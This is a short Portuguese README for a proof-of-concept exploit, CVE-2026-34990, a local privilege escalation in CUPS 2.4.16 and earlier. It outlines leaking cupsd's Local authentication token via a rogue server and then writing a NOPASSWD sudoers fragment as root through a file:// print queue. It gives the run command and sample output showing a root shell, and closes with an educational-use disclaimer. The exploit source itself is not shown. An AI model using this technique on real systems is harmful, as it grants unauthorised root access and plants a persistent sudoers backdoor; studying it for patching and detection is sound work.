
PoC mínimo para CVE-2026-34990: escalada de privilégios local no CUPS <= 2.4.16 que vaza o token de autenticação Local do cupsd e grava um fragmento NOPASSWD do sudoers como root.
Escalação de privilégios local contra o CUPS <= 2.4.16 em execução como root. Vaza o token de autenticação Local do cupsd e, em seguida, grava um fragmento de sudoers NOPASSWD como root através de uma fila de impressão file://.
python3 poc.py
Em caso de sucesso:
[*] CVE-2026-34990 | user=ctfplayer | cupsd=127.0.0.1:631
[*] coercing cupsd - rogue server ...
[+] captured token: f4a8...c31b
[*] writing sudoers ...
[+] wrote /etc/sudoers.d/ctfplayer-pwn
[+] ROOT: uid=0(root) gid=0(root) groups=0(root)
[*] run: sudo -i
Depois:
sudo -i
Este script destina-se apenas a fins educacionais. O autor não é responsável por qualquer uso indevido ou dano causado por este exploit. Certifique-se sempre de que tem permissão antes de testar ou explorar vulnerabilidades!